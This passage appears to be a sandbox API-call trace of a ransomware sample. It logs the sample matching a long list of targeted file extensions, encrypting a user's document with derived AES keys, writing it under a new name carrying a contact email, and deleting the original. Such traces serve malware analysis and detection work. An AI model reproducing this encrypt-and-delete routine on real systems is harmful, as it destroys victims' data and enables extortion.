	[0189.337] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odt") returned=".odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.338] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.338] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.338] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.342] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xe534, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xe534, lpOverlapped=0x0) returned 1
	[0189.345] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.346] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcabc0) returned 1
	[0189.349] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.349] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.349] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.349] CryptHashData (hHash=0xfb95b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.349] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.350] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb95b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb95f0) returned 1
	[0189.350] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.350] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xe534, dwBufLen=0xe534 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xe540) returned 1
	[0189.351] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.351] RtlMoveMemory (in: Destination=0xfeb6c0, Source=0xfdd180, Length=0xe534 | out: Destination=0xfeb6c0) 
	[0189.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.352] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb6c0*, pdwDataLen=0x18a1ec*=0xe534, dwBufLen=0xe540 | out: pbData=0xfeb6c0*, pdwDataLen=0x18a1ec*=0xe540) returned 1
	[0189.354] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.354] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0189.354] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.355] CryptDestroyHash (hHash=0xfb95b0) returned 1
	[0189.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.355] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0189.355] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.355] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.356] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.357] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 124
	[0189.358] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.358] WriteFile (in: hFile=0x390, lpBuffer=0xfeb6c0*, nNumberOfBytesToWrite=0xe540, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfeb6c0*, lpNumberOfBytesWritten=0x18a648*=0xe540, lpOverlapped=0x0) returned 1
	[0189.368] CloseHandle (hObject=0x390) returned 1
	[0189.369] CloseHandle (hObject=0x388) returned 1
	[0189.369] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt")) returned 1
	[0189.376] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt")) returned 0
	[0189.376] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aec06f0, ftCreationTime.dwHighDateTime=0x1d96c37, ftLastAccessTime.dwLowDateTime=0x26115510, ftLastAccessTime.dwHighDateTime=0x1d97176, ftLastWriteTime.dwLowDateTime=0x26115510, ftLastWriteTime.dwHighDateTime=0x1d97176, nFileSizeHigh=0x0, nFileSizeLow=0xe202, dwReserved0=0x0, dwReserved1=0x0, cFileName="N8imDQrLy0-89M.doc", cAlternateFileName="N8IMDQ~1.DOC")) returned 1
	[0189.376] lstrcmpW (lpString1="N8imDQrLy0-89M.doc", lpString2="..") returned 1
	[0189.377] lstrcmpW (lpString1="N8imDQrLy0-89M.doc", lpString2=".") returned 1
	[0189.377] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.377] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="N8imDQrLy0-89M.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\N8imDQrLy0-89M.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\N8imDQrLy0-89M.doc"
	[0189.377] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\N8imDQrLy0-89M.doc") returned 90
	[0189.377] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.384] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\N8imDQrLy0-89M.doc", cchLength=0x5a | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc") returned 0x5a
	[0189.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.384] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc"
	[0189.384] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc") returned 90
	[0189.384] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.385] StrStrW (lpFirst=".doc", lpSrch=".") returned=".doc"
	[0189.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.385] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs